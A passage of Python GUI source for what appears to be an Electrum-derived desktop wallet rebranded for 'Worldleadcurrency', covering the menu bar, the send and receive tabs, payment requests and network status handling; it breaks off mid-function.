QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.connect(self, QtCore.SIGNAL('payment_request_ok'), self.payment_request_ok)
self.connect(self, QtCore.SIGNAL('payment_request_error'), self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.connect(self, QtCore.SIGNAL('network'), self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.fetch_alias()
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
elif event in ['status', 'banner', 'verified']:
# Handle in GUI thread
self.emit(QtCore.SIGNAL('network'), event, *args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, *args):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.emit(SIGNAL('alias_received'))
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def update_account_selector(self):
# account selector
accounts = self.wallet.get_account_names()
self.account_selector.clear()
if len(accounts) > 1:
self.account_selector.addItems([_("All accounts")] + accounts.values())
self.account_selector.setCurrentIndex(0)
self.account_selector.show()
else:
self.account_selector.hide()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
self.wallet.storage.put('accounts_expanded', self.accounts_expanded)
run_hook('close_wallet', self.wallet)
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
self.import_old_contacts()
# address used to create a dummy transaction and estimate transaction fee
self.accounts_expanded = self.wallet.storage.get('accounts_expanded',{})
self.current_account = self.wallet.storage.get("current_account", None)
self.history_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.update_new_account_menu()
self.seed_menu.setEnabled(self.wallet.has_seed())
self.mpk_menu.setEnabled(self.wallet.is_deterministic())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.receive_list.update()
self.tabs.show()
try:
self.setGeometry(*self.wallet.storage.get("winpos-qt"))
except:
self.setGeometry(100, 100, 840, 400)
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def watching_only_changed(self):
title = 'Electrum %s - %s' % (self.wallet.electrum_version,
self.wallet.basename())
if self.wallet.is_watching_only():
self.warn_if_watching_only()
title += ' [%s]' % (_('watching only'))
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_menu.setVisible(self.wallet.can_import())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Worldleadcurrencies with it."),
_("Make sure you own the seed phrase or the private keys, before you request Worldleadcurrencies to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def import_old_contacts(self):
# backward compatibility: import contacts
old_contacts = self.wallet.storage.get('contacts', [])
if old_contacts:
for k in set(old_contacts):
l = self.wallet.labels.get(k)
if bitcoin.is_address(k) and l:
self.contacts[l] = ('address', k)
self.wallet.storage.put('contacts', None)
def open_wallet(self):
wallet_folder = self.get_wallet_folder()
filename = unicode(QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder))
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename = unicode( QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder) )
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error), reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
wallet_folder = self.get_wallet_folder()
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
filename = line_dialog(self, _('New Wallet'), _('Enter file name')
+ ':', _('OK'), filename)
if not filename:
return
full_path = os.path.join(wallet_folder, filename)
if os.path.exists(full_path):
self.show_critical(_("File exists"))
return
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&New contact"), self.new_contact_dialog)
self.new_account_menu = wallet_menu.addAction(_("&New account"), self.new_account_dialog)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.mpk_menu = wallet_menu.addAction(_("&Master Public Keys"), self.show_master_public_keys)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
wallet_menu.addAction(_("&Export History"), self.export_history_dialog)
wallet_menu.addAction(_("Search"), self.toggle_search).setShortcut(QKeySequence("Ctrl+S"))
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in OSX using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.run_network_dialog)
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
if self.network.is_connected():
d = self.network.get_donation_address()
host = self.network.get_parameters()[0]
self.pay_to_URI('worldleadcurrency:%s?message=donation for %s'%(d, host))
def show_about(self):
QMessageBox.about(self, "Electrum",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" + _("Electrum's focus is speed, with low resource usage and simplifying Worldleadcurrency. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Worldleadcurrency system."))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are more then three
tx_amount = len(self.tx_notifications)
if(tx_amount >= 3):
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
total_amount += v
self.notify(_("%(txs)s new transactions received. Total amount received in the new transactions %(amount)s") \
% { 'txs' : tx_amount, 'amount' : self.format_amount_and_units(total_amount)})
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
self.notify(_("New transaction received. %(amount)s") % { 'amount' : self.format_amount_and_units(v)})
def notify(self, message):
if self.tray:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', unicode(os.path.expanduser('~')))
fileName = unicode( QFileDialog.getOpenFileName(self, title, directory, filter) )
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', unicode(os.path.expanduser('~')))
path = os.path.join( directory, filename )
fileName = unicode( QFileDialog.getSaveFileName(self, title, path, filter) )
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
self.connect(sender, QtCore.SIGNAL('timersignal'), self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = run_hook('format_amount_and_units', amount)
if text and x:
text += ' (%s)'%x
return text
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'µWLC'
if self.decimal_point == 5:
return 'mWLC'
if self.decimal_point == 8:
return 'WLC'
raise Exception('Unknown base unit')
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging (%d blocks)"%server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
use_height = self.network.get_local_height()
c, u, x = self.wallet.get_account_balance(self.current_account, use_height)
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price from exchange rate plugin
rate = run_hook('get_fiat_status_text', c + u + x)
if rate:
text += rate
icon = QIcon(":icons/status_connected.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
if self.wallet.up_to_date:
self.check_next_account()
def update_tabs(self):
self.history_list.update()
self.receive_list.update()
self.address_list.update()
self.contacts_list.update()
self.invoices_list.update()
self.update_completions()
def create_history_tab(self):
from history_widget import HistoryWidget
self.history_list = l = HistoryWidget(self)
return l
def show_address(self, addr):
import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Worldleadcurrency address where the payment should be received. Note that each payment request uses a different Worldleadcurrency address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.expires_combo = QComboBox()
self.expires_combo.addItems(map(lambda x:x[0], expiration_values))
self.expires_combo.setCurrentIndex(1)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Worldleadcurrency addresses.'),
_('The worldleadcurrency address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
self.receive_list = MyTreeWidget(self, self.receive_list_menu, [_('Date'), _('Account'), _('Address'), '', _('Description'), _('Amount'), _('Status')], 4)
self.receive_list.currentItemChanged.connect(self.receive_item_changed)
self.receive_list.itemClicked.connect(self.receive_item_changed)
self.receive_list.setSortingEnabled(True)
self.receive_list.setColumnWidth(0, 180)
self.receive_list.hideColumn(1)
self.receive_list.hideColumn(2)
self.receive_list.on_update = self.update_receive_tab
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.receive_list)
vbox.setStretchFactor(self.receive_list, 1000)
return w
def receive_item_changed(self, item):
if item is None:
return
if not self.receive_list.isItemSelected(item):
return
addr = str(item.text(2))
req = self.wallet.receive_requests[addr]
expires = util.age(req['time'] + req['exp']) if req.get('exp') else _('Never')
amount = req['amount']
message = self.wallet.labels.get(addr, '')
self.receive_address_e.setText(addr)
self.receive_message_e.setText(message)
self.receive_amount_e.setAmount(amount)
self.expires_combo.hide()
self.expires_label.show()
self.expires_label.setText(expires)
self.new_request_button.setEnabled(True)
def delete_payment_request(self, item):
addr = str(item.text(2))
self.wallet.remove_payment_request(addr, self.config)
self.receive_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = req.get('sig').decode('hex')
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def receive_list_menu(self, position):
item = self.receive_list.itemAt(position)
addr = str(item.text(2))
req = self.wallet.receive_requests[addr]
menu = QMenu(self)
menu.addAction(_("Copy Address"), lambda: self.view_and_paste(_('Address'), '', addr))
menu.addAction(_("Copy URI"), lambda: self.view_and_paste('URI', '', self.get_request_URI(addr)))
menu.addAction(_("Save as BIP70 file"), lambda: self.export_payment_request(addr))
menu.addAction(_("Delete"), lambda: self.delete_payment_request(item))
run_hook('receive_list_menu', menu, addr)
menu.exec_(self.receive_list.viewport().mapToGlobal(position))
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = unicode(self.receive_message_e.text())
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = map(lambda x: x[1], expiration_values)[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(addr)
self.receive_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(str(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address(self.current_account)
if addr is None:
if isinstance(self.wallet, Imported_Wallet):
self.show_message(_('No more addresses in your wallet.'))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(self.current_account, False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_unused_address(self.current_account)
self.receive_address_e.setText(addr if addr else '')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.tabs.setCurrentIndex(2)
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_tab(self):
# hide receive tab if no receive requests available
b = len(self.wallet.receive_requests) > 0
self.receive_list.setVisible(b)
self.receive_requests_label.setVisible(b)
if not b:
self.expires_label.hide()
self.expires_combo.show()
# check if it is necessary to show the account
self.receive_list.setColumnHidden(1, len(self.wallet.get_accounts()) == 1)
# update the receive address if necessary
current_address = self.receive_address_e.text()
domain = self.wallet.get_account_addresses(self.current_account, include_change=False)
addr = self.wallet.get_unused_address(self.current_account)
if not current_address in domain and addr:
self.set_receive_address(addr)
self.new_request_button.setEnabled(addr != current_address)
# clear the list and fill it again
self.receive_list.clear()
for req in self.wallet.get_sorted_requests(self.config):
address = req['address']
if address not in domain:
continue
timestamp = req.get('time', 0)
amount = req.get('amount')
expiration = req.get('exp', None)
message = req.get('memo', '')
date = format_time(timestamp)
status = req.get('status')
signature = req.get('sig')
requestor = req.get('name', '')
amount_str = self.format_amount(amount) if amount else ""
account = ''
item = QTreeWidgetItem([date, account, address, '', message, amount_str, pr_tooltips.get(status,'')])
if signature is not None:
item.setIcon(3, QIcon(":icons/seal.png"))
item.setToolTip(3, 'signed by '+ requestor)
if status is not PR_UNKNOWN:
item.setIcon(6, QIcon(pr_icons.get(status)))
self.receive_list.addTopLevelItem(item)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = unicode(self.receive_message_e.text()).encode('utf8')
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def show_before_broadcast(self):
return self.config.get('show_before_broadcast', False)
def set_show_before_broadcast(self, show):
self.config.set_key('show_before_broadcast', bool(show))
self.set_send_button_text()
def set_send_button_text(self):
if self.show_before_broadcast():
text = _("Send...")
elif self.wallet and self.wallet.is_watching_only():
text = _("Send...")
else:
text = _("Send")
self.send_button.setText(text)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Worldleadcurrency address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Worldleadcurrency address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
msg = _('Worldleadcurrency transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
self.fee_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(self.fee_e_label, 5, 0)
grid.addWidget(self.fee_e, 5, 1)
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.send_button)
buttons.addWidget(self.clear_button)
grid.addLayout(buttons, 6, 1, 1, 2)
def on_shortcut():
inputs = self.get_coins()
sendable = sum(map(lambda x:x['value'], inputs))
fee = self.fee_e.get_amount() if self.fee_e.isModified() else None
addr = self.get_payto_or_dummy()
amount, fee = self.wallet.get_max_amount(self.config, inputs, addr, fee)
if not self.fee_e.isModified():
self.fee_e.setAmount(fee)
self.amount_e.setAmount(amount)
self.not_enough_funds = (fee + amount > sendable)
# emit signal for fiat_amount update
self.amount_e.textEdited.emit("")
self.amount_e.shortcut.connect(on_shortcut)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
def entry_changed():
text = ""
if self.not_enough_funds:
amt_color, fee_color = RED_FG, RED_FG
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
elif self.fee_e.isModified():
amt_color, fee_color = BLACK_FG, BLACK_FG
elif self.amount_e.isModified():
amt_color, fee_color = BLACK_FG, BLUE_FG
else:
amt_color, fee_color = BLUE_FG, BLUE_FG
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color)
self.fee_e.setStyleSheet(fee_color)
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
self.invoices_list = MyTreeWidget(self, self.invoices_list_menu,
[_('Expires'), _('Requestor'), _('Description'), _('Amount'), _('Status')], 2)
self.invoices_list.setSortingEnabled(True)
self.invoices_list.header().setResizeMode(1, QHeaderView.Interactive)
self.invoices_list.setColumnWidth(1, 200)
self.invoices_list.on_update = self.update_invoices_list
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoices_list)
vbox.setStretchFactor(self.invoices_list, 1000)
# Defer this until grid is parented to avoid ugly flash during startup
self.update_fee_edit()
run_hook('create_send_tab', grid)
return w
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
